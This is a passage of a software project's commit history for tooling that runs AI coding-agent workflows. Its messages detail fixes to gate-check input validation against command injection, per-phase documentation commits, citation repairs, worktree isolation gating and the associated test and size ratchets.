loop-hook-dispatch.md already mandates for ref.command, and the predicate arm is specified as a single argv element so an apostrophe cannot close the literal. TESTS: the first-cut regression tests only asserted that the shared loop phrase and the evaluator substrings co-occurred. A partial regression that kept the phrase but deleted the default arm would have passed them. Added a structural assertion that a distinguishable catch-all arm exists, comes after every named branch, and is where the generic evaluator is actually invoked. REFERENCE DRIFT: loop-hook-dispatch.md documented onError as skip/'fail', but the generated registry, all 35 manifest declarations, and all four dispatch sites use skip/halt — 'fail' appears nowhere. Corrected, since this PR newly cites that doc as ship.md's authority. Also notes the named-query arg convention's provenance (mirrors verify:pre verbatim; no capability declares a ship:pre query gate today). * fix(3559): close the same gate-check injection at all four sibling dispatch sites Maintainer directed fixing the sibling sites inline rather than filing them. The command-injection surface fixed at ship:pre is a FAMILY property, not a site property: every workflow that interpolates a manifest-supplied check.query into a shell command substitution has it. Root cause is in the contract, not the sites — references/loop-hook-dispatch.md mandates in-context validation for step -> ref.command and OMITS the same requirement for gate, so all four gate consumers inherited an unstated rule. Closed at the source (the reference's gate section now carries the rule) and at every consumer: execute-phase.md execute:wave:post, execute:post plan-phase.md plan:post verify-work.md verify:pre ship.md ship:pre (already hardened in a2d84a77) TESTS: section 6 enumerates the family by DISCOVERY, not by a hardcoded list, so a new dispatch site added later without the validation contract fails instead of shipping — the same 'hardcoded list silently misses members' mistake #3559 itself was. It asserts, per discovered site, that the charset is pinned, that validation is specified as in-context, and that the rule appears BEFORE the interpolation it guards (an executing agent reads top-down). A floor assertion fails the section if the discovery regex ever stops matching, so it cannot pass vacuously. Two further tests pin the reference's gate section and the halt/skip onError vocabulary. Sizes all within tier caps: execute-phase 94378/98304, plan-phase 91008/98304, verify-work 39488/61440, ship 38067/40960. Drift acks amended for each. * fix(3559): fit the validation mandate under the frozen pre-phase-6 ceiling The previous commit blew tests/claude-orchestration.test.cjs's frozen ADR-857 pre-phase-6 ceiling for execute-phase.md (93600): the file had only 209 bytes of headroom and the inline validation paragraph added 987. That ceiling is a ratchet proving Phase 6 extraction happened — raising it is never the answer. Restructured so the RULE lives once, in the reference's gate section (charset, in-context, single-argv, and the consent-surface rationale), and each of the five dispatch sites carries a terse mandate plus a pointer to it. That is strictly better than five verbatim restatements: this PR exists partly because the reference and its implementations had already drifted apart on the onError vocabulary, and five copies of a security rule is that same failure waiting to recur. execute-phase.md already eagerly inlines the reference (@-form at its step-hook dispatch), so an executing agent has the full rule in context regardless. Also reclaimed genuinely duplicated bytes at the execute:post site, whose prose restated both commands the fenced block immediately below already shows, and whose tail restated the two-step contract that the execute:wave:post site spells out in full. Net sizes vs origin/next: execute-phase.md 93365 (-26, SHRINKS) pre-phase-6 93600, margin 235 (was 209) plan-phase.md 90627 (+111) tier cap 98304 verify-work.md 39107 (+111) tier cap 61440 ship.md 36784 (+3058) tier cap 40960 Because execute-phase.md now shrinks, its drift-ack entry was reverted — an ack that is never consumed is reported as STALE and fails the check. The other three acks carry corrected byte figures. Tests follow the same split: section 6 asserts the mandate + pointer per discovered site and the full rule in the reference; section 5's security test drops the inline charset assertion it can no longer make of ship.md. * fix(3559): repair an over-escaped regex in the security assertion /loop-hook-dispatch\\.md/ matched a literal backslash before .md, so it could never match and the [security] assertion failed on the remote runner even though the prose it checks was correct. The over-escaping came from nesting a regex through a shell string into a node -e script; the sibling literal in section 6, written via a quoted heredoc, was unaffected. The reason this reached the runner at all is that the local check re-typed the regex by hand instead of executing the one in the file, so it validated a different pattern than the test used. Replaced that habit with two harnesses that read the literals FROM the source: one asserts every regex literal in the file matches something in the real workflow/reference corpus (catching over-escaping generically), the other evaluates the [security] and section-6 literals against their actual targets. * chore(3559): backfill changeset PR number (#3608) --------- Co-authored-by: sim <sim@local> |
||
|
|
debeabd524 |
enhance(#3587): add a per-phase commit_docs override (#3601)
* feat(#3587): add a per-phase commit_docs override Delivers epic #2292's second user story: commit an architecture phase's artifacts while execution phases stay local. commit_docs was project-wide and binary, so the only choices were all phases or none. Shape is a config dynamic key phase_commit_docs.<phase-id>, following the 14 existing dynamicKeyPatterns precedents rather than inventing a PLAN.md frontmatter spec -- which #2292 itself flags as becoming its own maintenance surface. Tier 1 resolves in cmdCommit, NOT in loadConfig: loadConfig has no phase context and is called by nearly every command, so threading one through it to serve a single caller would be a far larger blast radius for no gain. The phase comes from detectPhaseNumberFromFiles, which cmdCommit already computes for branch naming and which is already hardened against the #2539 project-code bug. Suppression by the per-phase tier returns its own reason rather than reusing skipped_commit_docs_false -- telling a user their project setting is false when it is true would be actively misleading. Additive; the two existing reason strings that agents/gsd-executor.md matches on are unchanged. The manifest's phase-id pattern is a hand-copy of PHASE_NUMBER_TOKEN_SOURCE because the manifest is hand-maintained JSON, so a behavioral parity test asserts both surfaces accept and reject the same token shapes. * fix(#3587): fold tests, close review findings, update reference docs Fold: the new tests were added as their own file, which required loosening a grandfathered lint-test-file-count bucket 5-to-6. A ratchet exists to go down only. commit-docs-bypass.test.cjs is the established commit_docs test home and already hosts two folded suites, so the tests fold there as a third block and the allowlist is reverted untouched. Standards review: CONTEXT.md and the test header both cited a phase-commit-docs-manifest-parity.test.cjs that never existed; a repo-wide sweep found a fourth stale cite in the schema manifest description. All four now name the real location. Spec review: the issue's Scope of changes named planning-config.md and git-planning-commit.md and neither was touched. Both now document the four-tier precedence and the new skip reason. Security review, minor and unproven: detectPhaseNumberFromFiles returns the FIRST matching path's phase, so a --files list spanning two phases resolves the override against whichever comes first. That helper is hardened and widely used, so it is not changed; the behavior is pinned by a named test and disclosed in the design and user docs. A pinned behavior is not a bug; an unpinned surprise is. * chore(#3587): backfill changeset pr number to 3601 --------- Co-authored-by: sim <sim@local> |
||
|
|
ec7e49a64c |
fix(#3576): repair all 43 dead references/ cites and gate the canonical resolvable form (#3596)
* test(#3576): gate shipped reference citations on the canonical resolvable form Failing-first gate for #3576: a backticked bare references/<name>.md cite resolves from no install location (agents, workflows, and references all install where a bare relative references/ path is dead). The gate walks the runtime-loaded trees the issue prescribes, strips @~/ include tokens PER-TOKEN (a line-skip guard would miss a bare cite sharing a line with an include — the issue-named trap), pins the genuinely relative ../ href and canonical forms as non-offenders, and checks canonical cite targets exist. 43 offenders today across 19 files. * fix(#3576): repair all 43 dead references/ cites to the canonical resolvable form Every backticked bare references/<name>.md cite across the 19 shipped files rewritten to gsd-core/references/<name>.md — the form every required_reading block and @~/ include already uses, and the only form that resolves from any install location. All 20 cited targets verified to exist; the one genuinely relative href (plan-phase.md's ../references/mvp-concepts.md) is untouched (the repair is backtick-anchored). Growth acks: new fragment for the three first-time paths, #3206-pattern appends to the five fragments already naming the other grown files (two ack sources may never name the same path). execute-phase.md lands at 93,391/93,400 and gsd-executor.md at 49,150/49,152 — exactly the issue's projections; every repair fits. * fix(#3576): drop stale default.md growth ack (nested modes file is hash-attributed, not growth-ratcheted) Review finding: the emitted-attribution ratchet covers only top-level workflows/ + agents/ files; discuss-phase/modes/default.md's delta is source-attributed, so acknowledging its growth is a stale entry the differential lane fails on. * chore(#3576): add changeset fragment * chore(#3576): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
285cd41be0 |
fix(#3206): define "explicit evidence" inline at verifier 5b; repair stale honest-verifier cites (#3435)
* fix(#3206): define "explicit evidence" inline at verifier 5b; repair stale honest-verifier cites
Step 3 item 5b abstained on non-inferable (backstop) truths "unless
confirmed by explicit evidence" with the term undefined — its definition
lived only in the non-included gsd-core/references/honest-verifier.md,
behind a stale bare `references/` cite that 404s. Undefined, the term
falls back to presence + wiring, the exact false-pass the #1154
abstention protocol refuses.
- 5b: inline the compressed definition (a passing wired
held-out/property-based test or directly observed behavior; presence +
wiring never qualifies) and fix the cite. +84 B on the rewritten line;
file lands at 49,151 of the 49,152 LARGE cap.
- verifier-phase-gates.md (already <required_reading>): gains the
backstop-abstention reporting contract — AFK completion line
("complete with N unverified non-inferable checks", never silent,
never a halt) and reason-distinctness (insufficient_spec vs manual-UAT
human_needed). New content, no relocation of measured prose.
- 5c (line 204) and MVP-mode (line 644) bare cites repaired to
gsd-core/references/ (+9 B each).
- Drift acks per ADR-2719 §4; two entries merge-appended into existing
fragments (two ack sources may never name the same path).
- Changeset fragment with the sanctioned pr: 0 placeholder (post-create
backfill).
Sibling census at next@7976b1ca0: 7 bare-cite instances in 4 agent
files; the 3 in gsd-verifier.md are fixed here, gsd-executor.md:429,439
and gsd-doc-synthesizer.md:20,176 stay with the epic #1891 follow-up.
Refs #1891
* chore(#3206): set changeset fragment pr to 3435
* fix(#3206): drop stale emitted-drift-ack entries that trip the ADR-2719 ratchet
The round's ack bookkeeping explained ripples that were already
self-attributed, so `tests/emitted-attribution.test.cjs` failed
deterministically on the PR head with 5 stale acknowledgments.
`agents/gsd-verifier.md` and `gsd-core/references/verifier-phase-gates.md`
appear directly in `git diff --name-only`, so PROVENANCE_RULES attributes
their emitted deltas without an ack; `agents/gsd-verifier.agent.md`,
`agents/gsd-verifier.toml` and `agents/subagents/gsd-verifier.md` are
derived emissions of a changed source and are attributed the same way.
None of the five entries could ever be consumed, so all five were stale.
Removed: the whole `3206-verifier-explicit-evidence.json` fragment (all
four entries) and the `#3206 append` to `0000-legacy-migration.json`.
Deliberately KEPT: the `#3206 append` to
`1955-verifier-coincidental-reliance.json`. Its `gsd-verifier.md` entry is
consumed by the size-growth ratchet, not the hash pass — the agent grew
49049 -> 49151 bytes, and `diffEmitted` treats a base-identical ack as
spent and excludes it from `ackEntries`. Reverting that append as well
turns the stale-ack failure into `1 file(s) grew without an
acknowledgment` (verified both ways locally).
* fix(#3206): compress 5b and re-acknowledge growth after rebase onto next
The rebase onto next (
|
||
|
|
3c61b4a838 |
enh(#3565): sentinel/contract registry + check:contract-drift lint (#3571)
* enh(#3565): sentinel/contract registry + check:contract-drift lint * fix(#3565): report artifact-row markers once and dedupe per marker * docs(#3565): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
2b9713a6b2 |
fix(#3557): accept claude code session id in the workstream session probe (#3570)
* test(#3557): failing-first regression for claude code session key probe * test(#3557): assert adapter source vocabulary in session probe test * fix(#3557): accept claude code session id in the workstream session probe * test(#3557): pin the new session key against both immediate neighbors * chore(#3557): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
bc9a22868f |
docs(#3530): correct model/effort precedence claims in model-profiles.md (#3536)
* docs(#3530): correct model/effort precedence claims in model-profiles.md * chore(#3530): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
8fc88f663d |
fix(#3210): gate unmet preconditions as blocking-human; cap blocker retries at needs_human (#3528)
* fix(#3210): gate unmet preconditions as blocking-human and cap blocker retries at needs_human * chore(#3210): add changeset fragment for PR #3528 * fix(#3210): restore blocking-human carve-out and CRLF-safe split --------- Co-authored-by: sim <sim@local> |
||
|
|
71180983a0 |
fix(#3423): standardize on <required_reading>, retire the files_to_read emit tag (#3432)
* fix(#3423): standardize on required_reading, retire files_to_read emit tag * test(#3423): flip tag assertions, extend consistency guard to spawner surfaces * fix(#3423): sweep capabilities fragments, regen registry+skills, anchor executor test * chore(#3423): acknowledge tag-rename emitted ripples and workflow growth * chore(#3423): broaden emitted-ripple acknowledgment to all embedders * chore(#3423): settle emitted-drift acks post-rebase (merge 3004/1689-owned keys) * chore(#3423): drop stale ripple acks, ack execute-phase growth * chore(#3423): restore pristine 3004 fragment, keep only consumed appends * chore(#3423): backfill changeset pr number * chore(#3423): settle emitted-drift acks post-merge (move code-review-fix ripple into 3190, tag-rename ripples into 3191/3297) * chore(#3423): re-arm 3324 ack for execute-phase.md tag-rename ripple * fix(#3423): trim 8 bytes from execute-phase model note to hold ADR-857 margin, re-arm 3370 ack for net +4 growth --------- Co-authored-by: sim <sim@local> |
||
|
|
43475a2e0f |
fix(#3440): retire GAP CLOSURE PLANS CREATED marker, document artifact return contract (#3443)
* fix(#3440): retire GAP CLOSURE PLANS CREATED marker, document artifact return contract * chore(#3440): backfill changeset pr number * docs(#3440): mark changeset docs-exempt with audit reason --------- Co-authored-by: sim <sim@local> |
||
|
|
8fba67a674 |
fix(#3303): correct code_review_depth doc; add agent_skills array form (#3449)
* fix(#3303): correct code_review_depth doc; add agent_skills array form * fix(#3303): backfill changeset pr field --------- Co-authored-by: sim <sim@local> |
||
|
|
d30c99bc92 |
chore(#3421): delete orphan verify-phase workflow, migrate live gates to verifier (#3422)
* chore(#1892): delete orphan verify-phase workflow, migrate live gates to verifier reference * test(#1892): retarget structural suites from verify-phase.md to verifier-phase-gates.md * chore(#1892): reword retired-workflow mentions for removed-but-needed lint * test(#1892): correct stale surface labels in retargeted suites * docs(#1892): add verifier-phase-gates row to locale inventories * chore(#3421): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
f0abdb1b89 |
fix(#2486): do not recommend or persist Claude-only worktree isolation on non-Claude runtimes (#2531)
* fix(#2486): runtime-branch the settings worktrees question + W020 health diagnostic On non-Claude runtimes /gsd:settings offered "Yes (Recommended)" for worktree isolation and persisted workflow.use_worktrees: true — the exact value the execution workflows fail closed on (#1521 guards). Branch the question on the same stamped config-get runtime read the guards use: Claude keeps the unchanged question; non-Claude offers only "No (Recommended)" / "Leave unchanged", never persists true, and warns when the config carries an inherited explicit true. /gsd:health gains W020, surfacing such a config with the guards' own predicate before execution-time failure. Docs state the runtime-conditional default. Fixes #2486 Co-Authored-By: Claude Fable 5 <noreply@anthropic.com> * chore(#2486): add changeset for PR #2531 Co-Authored-By: Claude Fable 5 <noreply@anthropic.com> * fix(#2486): reassign the health worktrees check W020 -> W024 (verify.cts namespace collision) The workflow-level check collided with the live W020 (git-worktree-list health) emitted by cmdValidateHealth in src/verify.cts — invisible from health.md's error_codes table, which stops at W019 and under-represents the real namespace (W010-W017, W020-W023 all live). W024 verified free. Adds a regression test pinning the chosen code against src/verify.cts so a future assignment cannot silently collide, a table note naming the namespace owner, and the changeset body reworded to house style. Co-Authored-By: Claude Fable 5 <noreply@anthropic.com> * fix(#2486): pre-select the recommended repair in the broken-inheritance case Review round 2: at settings.md:142 the pre-selection rule left "Leave unchanged" as the default when the config carried an explicit non-false use_worktrees — the exact broken state the adjacent notice warns about, so accepting the default kept a config that fails closed at execution time. "Leave unchanged" is now the default only when the key is absent (nothing to repair); explicit false AND explicit non-false both pre-select "No (Recommended)", aligning the default, the label, and the notice. Pinned by two source-contract assertions in the #2486 regression block. Goldens (settings.md hash x19) + size baseline regenerated. Co-Authored-By: Claude Fable 5 <noreply@anthropic.com> * fix(#2486): gate the worktrees question on dispatch.isolation, not the runtime name Review round 2: #2584 Phase 3 replaced the runtime-name test with a declared `dispatch.isolation` capability, invalidating this PR's premise. cursor declares harness-worktree and codex/opencode/kimi/ kimi-code declare orchestrator-worktree, so a `RUNTIME != claude` gate blocked a supported configuration on five runtimes and false-warned in health. - settings.md + health.md read `query dispatch-isolation` and branch on `ISOLATION = none`; the runtime-name read is gone from both, and the capability read needs no per-runtime stamping (it fail-closes unknown/ undocumented internally) - all "Claude Code-only primitive" prose rewritten, including the two gates the shell-syntax check missed (config-key list, JSON schema comment) - W024 reconciled across health.md + CONFIGURATION.md + planning-config.md (docs still said W020, which collides with a verify.cts code) - health.md error-codes table fixed: the namespace note no longer sits between rows orphaning I001 - the asymmetry note for the two workflows #2584 has not migrated (quick.md, diagnose-issues.md) is enforced by a set-equality test with a self-check table, so it cannot go stale in either direction Co-Authored-By: Claude Fable 5 <noreply@anthropic.com> * docs(#2486): restore the Executor isolation section clobbered by #2661 `46ba02ac` (feat(#2630), the current next tip) reverted docs/CONFIGURATION.md to a pre-#2584 state: it restored the old "Non-Claude note" wording on the workflow.use_worktrees row and deleted the whole "Executor isolation per runtime" section. The change is unrelated to that PR's phase-estimation feature and looks like a stale-copy edit. This PR's use_worktrees row links to #executor-isolation-per-runtime, so the deletion leaves a dangling anchor. Restored byte-for-byte from |
||
|
|
2076d450d7 |
fix(#2652): gate quick/diagnose dispatch on dispatch.isolation, not the runtime name (#2728)
* fix(#2652): gate quick/diagnose dispatch on dispatch.isolation, not runtime name quick.md and diagnose-issues.md kept the pre-#2584 `RUNTIME != "claude"` worktree gate, so every non-Claude runtime failed closed regardless of the capability it negotiated — including Codex, which declares orchestrator-worktree. Route both through the negotiated dispatch.isolation seam via a new shared reference, and migrate the two execute-phase reference fragments that carried the same runtime-name gate. - new gsd-core/references/dispatch-isolation-gate.md: canonical ISOLATION resolution, harness-flag resolution, single-agent degrade rule - quick.md / diagnose-issues.md read the gate; dispatch uses the {harnessFlag} placeholder rather than a hardcoded isolation="worktree" - execute-phase-wave-guard.md / execute-phase-between-wave-reset.md: migrate [ "$RUNTIME" = "claude" ] -> [ "$ISOLATION" = "harness-worktree" ] - every degrade site now clears BOTH USE_WORKTREES and ISOLATION; clearing one dispatched an isolated agent with no base guard and no manifest - parity guard in host-integration.test.cjs scans workflows AND references and matches six reintroduction shapes - migrate four tests that pinned the pre-#2584 runtime-name contract Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * fix(#2652): use the /gsd:<cmd> namespace in the isolation degrade messages The degrade warnings cited /gsd-execute-phase, the retired hyphen form that slash-command-namespace.test.cjs rejects in Claude-facing source. Same length, so the quick.md size budget is unaffected. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * chore(#2652): add changeset for PR #2728 Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * fix(#2652): normalize dispatch-site paths to forward slashes for Windows path.relative() returns backslash-separated paths on Windows, so the #2652 dispatch-site parity test compared "gsd-core\workflows\quick.md" against the hardcoded forward-slash literal "gsd-core/workflows/quick.md" and failed on every windows-latest CI lane. Normalize with .replace(/\\/g, '/'), matching the existing convention used elsewhere in this suite (e.g. tests/branch-no-track-guard.test.cjs:37). * test(#2652): restore the size-growth acknowledgment The rebase dropped tests/emitted-drift-ack.json. #2757/#2758 fixed the ATTRIBUTION axis, but the SIZE-GROWTH axis is independent: diagnose-issues.md (+2086) and quick.md (+230) still need an ack naming them and saying why. Verified: 65/66 without it (both files named), 66/66 with it. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * fix(#2652): convert execute-plan.md Pattern A onto the dispatch-isolation gate Pattern A hardcoded `isolation="worktree"` — Claude Code's own literal — gated only on `workflow.use_worktrees`, with no capability negotiation at all. It is the same defect #2652 fixes at the other four sites, just a different shape: the file contains no RUNTIME variable, so the new detector correctly does not flag it. Concrete break: a Codex user who follows this PR's own newly-documented pattern and sets `workflow.use_worktrees: true` to get isolated dispatch via /gsd:quick then runs a plan through /gsd-execute-plan Pattern A, and hits an unconverted path — either an Agent() call erroring on an unrecognized parameter or silent unisolated execution, depending on host tolerance. Pattern A is a single-agent dispatch site through the host's own subagent tool, so it takes the same treatment as quick.md and diagnose-issues.md: resolve ISOLATION/HARNESS_FLAG through the canonical reference, degrade to sequential on orchestrator-worktree hosts, and substitute the host's declared {harnessFlag} instead of Claude Code's literal. while the area was open. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * docs(#2652): add the INVENTORY row for dispatch-isolation-gate.md, refresh CONTEXT Two bookkeeping gaps flagged in review: INVENTORY.md had no row for the new gsd-core/references/dispatch-isolation-gate.md. INVENTORY-MANIFEST.json was regenerated correctly and its --check only diffs a live directory scan against the committed manifest, so CI passed regardless — but gen-inventory-manifest.cjs's own stderr guidance says to add the matching INVENTORY.md row. This is the repo's named "Inventory Drift" pattern. Placed with the dispatch/isolation cluster (worktree-branch-check, runtime-aware-dispatch) rather than alphabetically, matching how that table is grouped. CONTEXT.md's Host-Integration Interface entry still described dispatch.isolation as "declared and negotiated but not yet consumed by any scheduler — Phase 1 of #2584". That was already stale before this PR (execute-phase graduated in Phase 3) and more so now with three single-agent dispatch sites consuming it. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * test(#2652): detect reversed-operand runtime gates; add a permutation property All five reintroduction regexes assumed $RUNTIME on the LEFT of the comparison, so `[ "claude" != "$RUNTIME" ]` — the same gate written backwards — evaded every one of them. Verified against the old patterns before fixing: all four reversed shapes (single bracket, double bracket, test builtin, JS template) scored EVADED. Each comparison shape is now generated in both operand orders from a single template, so a shape cannot be added in one order and forgotten in the other. The mutation table gains the four reversed cases. Also adds the fast-check property review suggested in place of the hand-rolled cases: it generates the cross product of the axes an author actually varies — bracket form, operator, operand order, quoting, spacing, runtime id — so a permutation the hand-written patterns miss surfaces here rather than in production. The 11 explicit cases stay as named regression anchors. execute-plan.md joins the scan's required-identities list now that it is a converted dispatch site. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * test(#2652): acknowledge the execute-plan.md size growth The Pattern A conversion adds 811 bytes to an emitted workflow. Per #2719 the size axis needs its own acknowledgment, independent of attribution. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com> * test(#2652): repin the execute-plan.md PROSE_ALLOWLIST line after the rebase The #2751 command-position gate pins its prose exemptions by line number. This branch inserts the dispatch-isolation resolution above the `validated downstream by gsd-tools uat classify-coverage` sentence, moving it from execute-plan.md:387 to :397 — which fired the gate twice for one displacement (an un-allowlisted mention at 397, a stale entry at 387). The prose itself is unchanged from next; only the pin moves. Fixes #2652 * fix(#2652): gate the #2649 base-check on ISOLATION in diagnose-issues.md The rebase onto next merged #2649's pre-dispatch base-check textually, but its degrade flipped USE_WORKTREES after ISOLATION was already resolved, so the degrade never reached the dispatch decision. Gate the block on ISOLATION = "harness-worktree" and degrade ISOLATION itself, the same pairing quick.md already uses. Co-Authored-By: Claude Fable 5 <noreply@anthropic.com> * fix(#2652): key quick.md post-dispatch bookkeeping on ISOLATION, not the Claude literal Review Blocker: the manifest append (l.822), worktree merge-back (l.825), and its skip clause (l.839) all conditioned on the literal isolation="worktree" — Claude Code's own rendering of {harnessFlag}. Cursor renders --worktree, so a newly-unblocked isolated Cursor run created a worktree whose committed work was never merged back and never cleaned up, silently. All three now key on ISOLATION = "harness-worktree" at dispatch. The existing parity detector cannot catch this class (its ISOLATION_TOKEN treats the literal as a legitimate marker), so this adds a dedicated literal-condition detector with a discrimination proof against both pre-fix sentences, a benign-mention control, and a positive pin on all three re-keyed conditions. Verified fail-first against the pre-fix quick.md. Co-Authored-By: Claude Fable 5 <noreply@anthropic.com> * fix(#2652): scope the use_worktrees=false install stamp to isolation=none runtimes `_stampNonClaudeRuntimeDefaults` rewrote every non-Claude runtime's `workflow.use_worktrees` read to `--default false`. That default resolved before `gsd_run query dispatch-isolation` was ever consulted, so the five runtimes that declare worktree support — cursor (harness-worktree) and codex/opencode/kimi/kimi-code (orchestrator-worktree) — got ISOLATION=none regardless of what they negotiated. The gate this PR migrates dispatch onto was therefore still deciding isolation by runtime name, one layer down. The stamp's #1521 premise was that worktree isolation *was* Claude Code's isolation="worktree" spawn parameter, which no other host honored. #2584 replaced that premise with the negotiated capability. The stamp is now scoped to runtimes whose negotiated isolation really is `none`, where the default it writes is the outcome the resolver reaches anyway. `_negotiatedDispatchIsolation` mirrors routeDispatchIsolation's resolution against the same registry — closed vocabulary, a harness-worktree host must declare its flag, an orchestrator-worktree host must carry a descriptor that resolves — and fails closed to `none` on anything else, so an undeclared or unknown runtime keeps today's behavior. Two #1515 tests pinned the superseded premise for codex and are re-pointed at the new contract rather than deleted: the safety property they protect is now held by the isolation gate's fail-closed resolution, not by a name-scoped install-time default. Verified fail-first — all five assertions red against the pre-fix source, green after. * test(#2652): acknowledge the emitted ripple and re-point the end-to-end stamp proof Scoping the use_worktrees stamp changes emitted output, and two gates caught it. `gsd-core/workflows/execute-phase.md` now differs at emit time for the five hosts that declare worktree support (cursor harness-worktree; codex, opencode, kimi, kimi-code orchestrator-worktree) — the source file is byte-identical, only the stamp is gone. Acknowledged in this PR's fragment. `tests/install.test.cjs`'s real-install assertion pinned the superseded premise end-to-end, asserting codex receives `--default false`. Re-pointed rather than deleted, matching the two unit tests: it now proves codex keeps the unstamped `true` read. A second arm installs windsurf — which declares isolation `none` — and asserts the false stamp is still applied there, so the change cannot silently degrade into "never stamp" without a test noticing. The ack entry collides with `2658-trae-instruction-file-path.json`, which is fully spent (merged via #2925, so all 25 of its entries are present at base and gate nothing) and is pruned for the same reason and by the same rule as the spent `2649-*` fragment this PR already removed. #2566 prunes the same file for the same collision on `new-project.md`; a delete/delete merges cleanly either way, and the base-side cleanup would make both unnecessary. * fix(#2652): re-record the sentinel when a dispatch site degrades isolation Review Blocker B1/B2/B3. Every isolation degrade in a dispatch site is decided in shell, where routeDispatchIsolation cannot see it. That resolver persists whatever it resolved to the run-scoped sentinel as an unconditional side effect (#3045), so a degrade that only reassigns $ISOLATION leaves the sentinel asserting harness-worktree while the dispatch correctly omits the harness flag. The shipped PreToolUse guard reads the sentinel at the instant of the Agent() call and denies that mismatch with exit 2 — the work does not run unisolated, it does not run at all. Latent on this branch and lands on rebase, since |